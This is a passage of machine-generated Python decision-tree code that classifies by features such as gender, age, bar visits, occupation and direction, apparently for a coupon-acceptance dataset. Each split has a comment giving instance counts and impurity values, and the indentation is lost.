if obj[11]<=0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4167, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.0, "depth": 12}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Direction_same", "instances": 58, "metric_value": 0.4713, "depth": 9}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 30, "metric_value": 0.4138, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Children", "instances": 29, "metric_value": 0.423, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 24, "metric_value": 0.4296, "depth": 12}
if obj[3]<=0:
# {"feature": "Education", "instances": 15, "metric_value": 0.4571, "depth": 13}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.3175, "depth": 13}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2, "depth": 12}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.4269, "depth": 10}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 19, "metric_value": 0.4145, "depth": 11}
if obj[10]>0.0:
# {"feature": "Education", "instances": 16, "metric_value": 0.4909, "depth": 12}
if obj[6]>0:
# {"feature": "Children", "instances": 11, "metric_value": 0.4949, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.3016, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.1429, "depth": 12}
if obj[10]>-1.0:
return 'True'
elif obj[10]<=-1.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]>20:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 185, "metric_value": 0.4726, "depth": 6}
if obj[7]<=7.951351351351351:
# {"feature": "Education", "instances": 114, "metric_value": 0.4532, "depth": 7}
if obj[6]<=3:
# {"feature": "Bar", "instances": 103, "metric_value": 0.4401, "depth": 8}
if obj[8]>-1.0:
# {"feature": "Age", "instances": 102, "metric_value": 0.44, "depth": 9}
if obj[4]>1:
# {"feature": "Restaurant20to50", "instances": 64, "metric_value": 0.4018, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Direction_same", "instances": 63, "metric_value": 0.4061, "depth": 11}
if obj[11]<=0:
# {"feature": "Gender", "instances": 35, "metric_value": 0.4303, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 18, "metric_value": 0.4375, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 17, "metric_value": 0.4118, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Children", "instances": 28, "metric_value": 0.3684, "depth": 12}
if obj[5]<=0:
# {"feature": "Gender", "instances": 19, "metric_value": 0.3323, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Restaurant20to50", "instances": 38, "metric_value": 0.4694, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Children", "instances": 37, "metric_value": 0.4787, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.4607, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4848, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.419, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.4718, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.45, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[10]<=-1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[8]<=-1.0:
return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Age", "instances": 11, "metric_value": 0.3409, "depth": 8}
if obj[4]<=4:
# {"feature": "Bar", "instances": 8, "metric_value": 0.3, "depth": 9}
if obj[8]>0.0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.4, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[4]>4:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>7.951351351351351:
# {"feature": "Direction_same", "instances": 71, "metric_value": 0.4524, "depth": 7}
if obj[11]<=0:
# {"feature": "Age", "instances": 39, "metric_value": 0.4438, "depth": 8}
if obj[4]<=2:
# {"feature": "Education", "instances": 25, "metric_value": 0.4047, "depth": 9}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.3412, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.3077, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 13, "metric_value": 0.337, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2143, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Children", "instances": 6, "metric_value": 0.4167, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
return 'False'
else: return 'False'
elif obj[10]<=-1.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.4667, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[5]>0:
# {"feature": "Bar", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
elif obj[8]>0.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[4]>2:
# {"feature": "Children", "instances": 14, "metric_value": 0.3357, "depth": 9}
if obj[5]<=0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.2857, "depth": 10}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2381, "depth": 11}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[6]<=2:
return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[6]>2:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=2:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>0:
# {"feature": "Bar", "instances": 32, "metric_value": 0.3822, "depth": 8}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 26, "metric_value": 0.3067, "depth": 9}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.1765, "depth": 10}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
# {"feature": "Age", "instances": 8, "metric_value": 0.3, "depth": 11}
if obj[4]>1:
# {"feature": "Education", "instances": 5, "metric_value": 0.4, "depth": 12}
if obj[6]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.3175, "depth": 10}
if obj[3]<=0:
# {"feature": "Age", "instances": 7, "metric_value": 0.3429, "depth": 11}
if obj[4]<=6:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.4, "depth": 12}
if obj[10]>-1.0:
# {"feature": "Education", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[6]>1:
return 'True'
elif obj[6]<=1:
return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[4]>6:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 6, "metric_value": 0.25, "depth": 9}
if obj[5]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 10}
if obj[3]>0:
# {"feature": "Age", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[4]<=7:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[12]>1:
# {"feature": "Bar", "instances": 427, "metric_value": 0.466, "depth": 5}
if obj[8]<=1.0:
# {"feature": "Age", "instances": 341, "metric_value": 0.4752, "depth": 6}
if obj[4]<=5:
# {"feature": "Occupation", "instances": 267, "metric_value": 0.4828, "depth": 7}
if obj[7]<=7.898876404494382:
# {"feature": "Education", "instances": 166, "metric_value": 0.4879, "depth": 8}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 146, "metric_value": 0.4806, "depth": 9}
if obj[10]>0.0:
# {"feature": "Children", "instances": 95, "metric_value": 0.4841, "depth": 10}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 72, "metric_value": 0.463, "depth": 11}
if obj[11]<=0:
# {"feature": "Time", "instances": 60, "metric_value": 0.4917, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 49, "metric_value": 0.4975, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4481, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 12, "metric_value": 0.2333, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.1667, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.3683, "depth": 11}
if obj[11]<=0:
# {"feature": "Time", "instances": 17, "metric_value": 0.4706, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4667, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 51, "metric_value": 0.4321, "depth": 10}
if obj[3]<=0:
# {"feature": "Time", "instances": 27, "metric_value": 0.4392, "depth": 11}
if obj[1]<=1:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4059, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.3714, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.3, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[1]>1:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Time", "instances": 24, "metric_value": 0.3571, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 21, "metric_value": 0.381, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 18, "metric_value": 0.4329, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>3:
# {"feature": "Time", "instances": 20, "metric_value": 0.3059, "depth": 9}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.3412, "depth": 10}
if obj[11]<=0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.2963, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.1852, "depth": 12}
if obj[10]<=0.0:
# {"feature": "Children", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]>0.0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>7.898876404494382:
# {"feature": "Direction_same", "instances": 101, "metric_value": 0.443, "depth": 8}
if obj[11]<=0:
# {"feature": "Children", "instances": 73, "metric_value": 0.4052, "depth": 9}
if obj[5]<=0:
# {"feature": "Time", "instances": 39, "metric_value": 0.4409, "depth": 10}
if obj[1]<=2:
# {"feature": "Gender", "instances": 25, "metric_value": 0.3806, "depth": 11}
if obj[3]>0:
# {"feature": "Education", "instances": 17, "metric_value": 0.4235, "depth": 12}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 15, "metric_value": 0.4571, "depth": 13}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.1667, "depth": 12}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[6]>0:
return 'True'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Education", "instances": 14, "metric_value": 0.3, "depth": 11}
if obj[6]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.3048, "depth": 12}
if obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2143, "depth": 13}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Time", "instances": 34, "metric_value": 0.3013, "depth": 10}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 27, "metric_value": 0.2326, "depth": 11}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 25, "metric_value": 0.2, "depth": 12}
if obj[6]<=2:
# {"feature": "Gender", "instances": 18, "metric_value": 0.2771, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[6]<=3:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2143, "depth": 11}
if obj[10]<=0.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[6]<=1:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[10]>0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 28, "metric_value": 0.3636, "depth": 9}
if obj[1]>0:
# {"feature": "Education", "instances": 22, "metric_value": 0.3636, "depth": 10}
if obj[6]<=2:
# {"feature": "Gender", "instances": 16, "metric_value": 0.2727, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 11, "metric_value": 0.3636, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[4]>5:
# {"feature": "Occupation", "instances": 74, "metric_value": 0.3997, "depth": 7}
if obj[7]<=11:
# {"feature": "Time", "instances": 62, "metric_value": 0.3637, "depth": 8}
if obj[1]<=1:
# {"feature": "Education", "instances": 42, "metric_value": 0.2961, "depth": 9}
if obj[6]>0:
# {"feature": "Gender", "instances": 29, "metric_value": 0.2318, "depth": 10}
if obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 16, "metric_value": 0.2946, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 14, "metric_value": 0.3333, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.25, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 13, "metric_value": 0.1231, "depth": 11}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.3192, "depth": 10}
if obj[11]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.1667, "depth": 11}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.3, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[1]>1:
# {"feature": "Education", "instances": 20, "metric_value": 0.419, "depth": 9}
if obj[6]<=2:
# {"feature": "Children", "instances": 14, "metric_value": 0.3673, "depth": 10}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.1429, "depth": 11}
if obj[10]>0.0:
return 'False'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.4286, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>2:
# {"feature": "Children", "instances": 6, "metric_value": 0.2667, "depth": 10}
if obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[7]>11:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.419, "depth": 8}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.381, "depth": 9}
if obj[11]<=0:
# {"feature": "Education", "instances": 6, "metric_value": 0.3333, "depth": 10}
if obj[6]<=1:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[1]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=1:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[6]>1:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2, "depth": 9}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Occupation", "instances": 86, "metric_value": 0.3849, "depth": 6}
if obj[7]>5:
# {"feature": "Gender", "instances": 64, "metric_value": 0.4295, "depth": 7}
if obj[3]<=0:
# {"feature": "Education", "instances": 55, "metric_value": 0.3958, "depth": 8}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 49, "metric_value": 0.3444, "depth": 9}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 38, "metric_value": 0.2653, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 25, "metric_value": 0.3537, "depth": 11}
if obj[4]>0:
# {"feature": "Time", "instances": 19, "metric_value": 0.4334, "depth": 12}
if obj[1]>0:
# {"feature": "Children", "instances": 17, "metric_value": 0.4777, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 11, "metric_value": 0.297, "depth": 10}
if obj[1]<=0:
# {"feature": "Age", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>0:
# {"feature": "Age", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 9}
if obj[11]<=0:
